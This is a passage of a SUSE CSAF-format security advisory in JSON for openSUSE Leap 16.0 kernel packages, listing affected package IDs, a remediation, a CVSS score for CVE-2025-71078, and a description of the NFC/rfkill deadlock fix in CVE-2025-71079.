"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71078",
"url": "https://www.suse.com/security/cve/CVE-2025-71078"
},
{
"category": "external",
"summary": "SUSE Bug 1256616 for CVE-2025-71078",
"url": "https://bugzilla.suse.com/1256616"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T13:03:55Z",
"details": "moderate"
}
],
"title": "CVE-2025-71078"
},
{
"cve": "CVE-2025-71079",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71079"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: nfc: fix deadlock between nfc_unregister_device and rfkill_fop_write\n\nA deadlock can occur between nfc_unregister_device() and rfkill_fop_write()\ndue to lock ordering inversion between device_lock and rfkill_global_mutex.\n\nThe problematic lock order is:\n\nThread A (rfkill_fop_write):\n rfkill_fop_write()\n mutex_lock(\u0026rfkill_global_mutex)\n rfkill_set_block()\n nfc_rfkill_set_block()\n nfc_dev_down()\n device_lock(\u0026dev-\u003edev) \u003c- waits for device_lock\n\nThread B (nfc_unregister_device):\n nfc_unregister_device()\n device_lock(\u0026dev-\u003edev)\n rfkill_unregister()\n mutex_lock(\u0026rfkill_global_mutex) \u003c- waits for rfkill_global_mutex\n\nThis creates a classic ABBA deadlock scenario.\n\nFix this by moving rfkill_unregister() and rfkill_destroy() outside the\ndevice_lock critical section. Store the rfkill pointer in a local variable\nbefore releasing the lock, then call rfkill_unregister() after releasing\ndevice_lock.\n\nThis change is safe because rfkill_fop_write() holds rfkill_global_mutex\nwhile calling the rfkill callbacks, and rfkill_unregister() also acquires\nrfkill_global_mutex before cleanup. Therefore, rfkill_unregister() will\nwait for any ongoing callback to complete before proceeding, and\ndevice_del() is only called after rfkill_unregister() returns, preventing\nany use-after-free.\n\nThe similar lock ordering in nfc_register_device() (device_lock -\u003e\nrfkill_global_mutex via rfkill_register) is safe because during\nregistration the device is not yet in rfkill_list, so no concurrent\nrfkill operations can occur on this device.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
